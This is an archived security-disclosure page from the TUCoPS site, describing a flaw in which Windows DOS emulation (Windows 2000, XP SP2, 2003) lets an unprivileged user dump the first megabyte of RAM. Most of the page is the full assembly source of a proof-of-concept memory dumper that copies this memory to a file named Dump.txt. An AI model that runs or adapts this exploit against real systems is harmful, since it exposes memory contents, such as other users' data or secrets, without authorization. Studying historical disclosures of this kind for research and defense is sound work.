Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: v7-2520.htm

Windows mem leakage



Windows mem leakage
Windows mem leakage



Desc : Windows Dos emulation allows dumping of first 1 Mo of RAM (with no
particular privilege).

Tested under : Win 2000, XP SP2, 2003

Code :

;---------------- [ dumper.asm ]-----------------------------------------
; Dump first 1 Mo of memory under any MS product
; 1 Mo is the maximum quantity of accessible memory
; in real mode using 16b OSes.
;
; endrazine, last update : 30/12/2005
;
;-------------------------------------------------------------------------

code segment
        org 100h
        assume ds:code, es:code, cs:code


        xor ax,ax
        mov si,ax

start:
        mov ah, 09h
        mov dx,offset welcome
        int 21h

        xor ax,ax              ;Wait until key pressed
        int 16h


        mov ah, 3ch                 ; MS DOS Create file Function
        mov dx, offset fname
        xor cx,cx
        int 21h


        mov ax, 3d01h               ; MS DOS Open file Function
        int 21h
        mov handle,ax


        xor ax,ax
        mov ds,ax
        mov myds,ds
        mov cx,32

dabigloop:
        push cx

        xor ax,ax
        mov si,ax

        ;==destination=        mov di,offset buffer
        mov es,cs

        ;==compteur=        mov cx,16384

        ;==copy=        rep movsw

        mov ds,cs

        xor ax,ax
        mov ah, 40h
        mov bx,handle
        mov cx,32768; +10
        mov dx, offset buffer
        int 21h

        mov ax,myds
;add ax,2047 ;repeat last 16b
        add ax,2048
        mov myds,ax
        mov ds,ax

        pop cx

        loop dabigloop

        mov ax,4ch                  ; Quit
        int 21h


myds dw ?
handle dw ?
welcome db '[ Raw Dos Memory Dumper ]',10,13
        db '',10,13
        db '[ coded by endrazine ]',10,13
        db '',10,13
        db '[ Dumping First Memory chunk to Dump.txt ]',10,13
        db 'Press any key$',10,13
fname db 'Dump.txt',0
buffer db 32768 dup ?
some_canari_separator db '//////////',0
end start

end


;------------------------------------------------------------------------



Endrazine-



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH